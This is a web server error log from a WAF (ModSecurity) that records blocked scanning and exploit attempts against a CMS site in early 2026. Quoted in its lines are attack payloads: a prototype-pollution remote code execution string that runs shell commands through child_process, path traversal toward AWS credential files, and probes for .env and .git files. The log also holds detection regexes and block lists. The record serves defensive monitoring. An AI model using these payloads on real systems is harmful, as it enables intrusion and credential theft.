Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769600793',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1769600793',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aXn2-FhOp7ZZChWKpwtDJwAAAVM"], referer: https://cms.dev-unit.com [Wed Jan 28 14:08:19.768722 2026] [:error] [pid 6774:tid 6844] [client 18.195.188.148:56916] [client 18.195.188.148] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aXn8M1hOp7ZZChWKpwtR-gAAAVU"] [Thu Jan 29 15:30:39.250562 2026] [:error] [pid 14971:tid 15063] [client 185.177.72.30:17014] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aXtg_6i0irOA7iaifXYykwAAAIA"] [Wed Feb 04 11:19:43.674136 2026] [:error] [pid 23343:tid 23354] [client 185.177.72.30:6972] [client 185.177.72.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aYMPL5KzqAe6oIsD2HhFxQAAAMk"] [Thu Feb 05 00:00:42.329106 2026] [:error] [pid 11103:tid 11110] [client 85.11.167.4:49148] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770242477_3309',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770242477_330..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYPBisS9A8z0dGN8UF8DAQAAAQA"], referer: https://cms.dev-unit.com [Thu Feb 05 09:08:34.553444 2026] [core:error] [pid 28561:tid 28564] (5)Input/output error: [client 45.148.10.238:60386] AH00036: access to /.env failed (filesystem path '/home') [Thu Feb 05 09:08:34.587319 2026] [core:error] [pid 28468:tid 28484] (5)Input/output error: [client 45.148.10.238:60402] AH00036: access to /.aws/credentials failed (filesystem path '/home') [Thu Feb 05 09:08:34.597699 2026] [core:error] [pid 2383:tid 2427] (5)Input/output error: [client 45.148.10.238:60418] AH00036: access to /aws.env failed (filesystem path '/home') [Thu Feb 05 10:19:56.255754 2026] [core:error] [pid 28468:tid 28478] (5)Input/output error: [client 185.93.89.136:59100] AH00036: access to /.git/HEAD failed (filesystem path '/home') [Thu Feb 05 11:43:51.471671 2026] [core:error] [pid 2383:tid 2423] (5)Input/output error: [client 195.178.110.54:54636] AH00036: access to / failed (filesystem path '/home') [Thu Feb 05 20:59:43.206670 2026] [:error] [pid 2161:tid 2237] [client 209.97.161.2:65118] [client 209.97.161.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:akaalb_uspop_staging. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ~ found within REQUEST_COOKIES:akaalb_uspop_staging: 2147483647~op=uspop_staging:uss-p-ngx7-2|~rv=5~m=uss-p-ngx7-2:0|~os=6fe23eaf334205d9e28642ffc227db61~id=ec12a6eaf783aa398595e88a68fef699"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYTonr7D-EufUMyJ0JiFxgAAAJU"], referer: https://cmo.gvh.mybluehost.me//blog//wp-login.php [Fri Feb 06 14:12:48.719508 2026] [:error] [pid 10241:tid 10286] [client 85.11.167.4:59492] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379969_3525',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1770379969_352..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYXawHWLTcm1yGnO9p1CTQAAAZA"], referer: https://cms.dev-unit.com [Fri Feb 06 14:12:48.846134 2026] [:error] [pid 3797:tid 3817] [client 85.11.167.4:59494] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379969',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1770379969',{'timeo..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aYXawFrG6MBA5FWAhmy5pAAAAM0"], referer: https://cms.dev-unit.com [Tue Feb 10 18:11:01.014555 2026] [:error] [pid 9330:tid 9335] [client 20.43.35.7:17848] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Feb 10 18:11:05.170098 2026] [:error] [pid 9330:tid 9352] [client 20.43.35.7:51170] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Tue Feb 10 18:11:16.366988 2026] [:error] [pid 732:tid 755] [client 20.43.35.7:1914] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Feb 10 18:11:34.357863 2026] [:error] [pid 9330:tid 9347] [client 20.43.35.7:17829] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Feb 11 03:24:18.570079 2026] [:error] [pid 17831:tid 17860] [client 45.148.10.159:42396] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aYvaQjzFhtoa3tKUW3SkrAAAAZg"] [Fri Feb 20 07:37:13.355096 2026] [:error] [pid 25368:tid 25391] [client 163.7.3.41:54194] [client 163.7.3.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/apps"] [unique_id "aZfzCRYI-0eHkwyuwt-85QAAAQs"] [Sat Feb 21 20:53:46.998002 2026] [:error] [pid 12371:tid 12389] [client 52.231.66.246:57837] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Thu Feb 26 00:55:46.416462 2026] [authz_core:error] [pid 25918:tid 26018] [client 206.81.24.227:57722] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Thu Feb 26 00:55:46.562472 2026] [authz_core:error] [pid 25916:tid 26000] [client 142.93.129.190:33962] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Thu Feb 26 00:56:00.649910 2026] [:error] [pid 25918:tid 26018] [client 206.81.24.227:56740] [client 206.81.24.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZ9-AIx00skzHN5jRIhAhAAAAIU"] [Thu Feb 26 00:56:00.671423 2026] [:error] [pid 25918:tid 26010] [client 142.93.129.190:41532] [client 142.93.129.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aZ9-AIx00skzHN5jRIhAhQAAAIE"] [Thu Feb 26 06:28:57.873701 2026] [:error] [pid 25947:tid 25986] [client 18.202.217.12:58208] [client 18.202.217.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('(whoami) 2>&1 || true',{'timeout':5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'), {digest: found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aZ_MCRFt5xbrUjTtutLlFAAAAEg"] [Fri Feb 27 04:41:14.797186 2026] [:error] [pid 19414:tid 19495] [client 163.7.4.249:32878] [client 163.7.4.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaEESol2XTe6vwfq2aEPPwAAABQ"] [Fri Feb 27 06:13:09.784545 2026] [:error] [pid 19590:tid 19611] [client 163.7.4.249:52872] [client 163.7.4.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, ..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaEZ1dky4CVhPBJ_vGvBewAAANM"] [Fri Feb 27 07:39:55.150946 2026] [:error] [pid 21508:tid 21534] [client 185.177.72.52:15600] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aaEuK8_7XKceGHnFn7KMBQAAAQw"] [Fri Feb 27 07:39:59.557976 2026] [:error] [pid 21508:tid 21524] [client 185.177.72.52:58094] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.bak"] [unique_id "aaEuL8_7XKceGHnFn7KMqgAAAQI"] [Fri Feb 27 07:40:00.065746 2026] [:error] [pid 21508:tid 21529] [client 185.177.72.52:58110] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms.dev-unit.com"] [uri "/pms"] [unique_id "aaEuMM_7XKceGHnFn7KMwQAAAQc"] [Fri Feb 27 07:40:14.714947 2026] [access_compat:error] [pid 21508:tid 21524] [client 185.177.72.52:13026] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Fri Feb 27 07:40:15.901278 2026] [:error] [pid 21508:tid 21523] [client 185.177.72.52:13080] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aaEuP8_7XKceGHnFn7KNsgAAAQE"] [Fri Feb 27 07:40:18.805467 2026] [:error] [pid 19590:tid 19600] [client 185.177.72.52:13204] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/env.backup"] [unique_id "aaEuQtky4CVhPBJ_vGvrfQAAAMg"] [Fri Feb 27 07:40:22.514481 2026] [:error] [pid 21508:tid 21524] [client 185.177.72.52:13388] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ 